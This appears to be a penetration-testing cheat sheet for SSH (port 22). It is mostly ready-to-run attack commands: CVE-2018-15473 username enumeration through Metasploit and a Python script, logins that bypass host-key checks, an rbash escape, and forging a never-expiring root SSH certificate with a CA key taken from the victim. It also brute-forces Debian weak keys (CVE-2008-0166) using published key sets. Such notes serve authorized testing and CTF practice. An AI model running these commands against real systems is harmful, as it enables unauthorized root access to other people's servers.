22 ) SSH
User Enumeration (OpenSSH 7.7 | CVE-2018-15473)
## ------------------| Using MSF
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <IP>
set USER_FILE userlist.txt
run
## ------------------| Using Python
git clone https://gitlab.com/epi052/cve-2018-15473.git && cd cve-2018-15473
pip install -r requirements.txt
python3 ssh-username-enum.py -w userlist.txt <IP>SSH login with options
## ------------------| Disable SSH PubKeys [Used for windows with ssh]
ssh -o PubkeyAuthentication=no user@host
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@host
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss user@host
## ------------------| Prevents ssh from attempting to save the host key
ssh -o UserKnownHostsFile=/dev/null user@host
## ------------------| Instruct ssh to not prompt us to accept the host key
ssh -o StrictHostKeyChecking=no user@host
## ------------------| Escape rbash
ssh -t bash user@host
## ------------------| Using sshpass
sshpass -f<key> ssh <user>@<IP>
sshpass -p<password> ssh <user>@<ip> SSH Certificate-Based Authentication for Root Access
## ------------------| Background
### This method allows you to generate an SSH certificate that grants root access
### using a trusted Certificate Authority (CA) key.
## ------------------| Prerequisites
### You already have a private key (ca_key) and its corresponding public key (ca_key.pub).
### The CA public key (ca_key.pub) is listed in the SSH serverβs configuration (/etc/ssh/sshd_config.d/sshcerts.conf)
### The entry should look like this --> TrustedUserCAKeys /etc/ssh/ca_key.pub
## ------------------| Getting root access
ssh-keygen -t ed25519 -f root
ssh-keygen -s <private_key_from_victim> -z 223 -I 'root' -V -5m:forever -n root root.pub
#### -s <private_key_from_victim> β The CA private key used for signing.
#### -z 223 β (Doesnβt really matter) Serial number (223) for tracking issued certificates.
#### -I 'root' β Identity label (root).
#### -V -5m:forever β Sets the validity period:
######## -5m β Starts 5 minutes in the past (to avoid clock drift issues).
######## forever β The certificate never expires.
######## if you want expire it in 42 weeks --> -5m:+42w
#### -n root β Specifies that only root can use this key.
#### root.pub β The public key being signed.
ssh-keygen -L -f root-cert.pub
chmod 600 root
ssh -i root root@<IP>CVE-2008-0166 (
Debian-based systems | September 2006 <--> 2008 May 13th)
https://www.exploit-db.com/exploits/5720Predictable PRNG Brute Force SSH
## ------------------| Info
## OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives)
## you need authorized_keys file on your machine.
## ------------------| Setup
## Add "PubkeyAcceptedKeyTypes +ssh-dss" to /etc/ssh/ssh_config file
git clone https://github.com/g0tmi1k/debian-ssh
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
tar -xf *.bz2
## check anything match with authorized_keys file.
## Copy the first 40 chars in the authorized_keys, then search it in the repo
grep -lr 'AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNA'
## After finding the pub key, The corresponding Private key which is also in the same directory (without pub).
ssh -i key -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@$IPLast updated
Was this helpful?
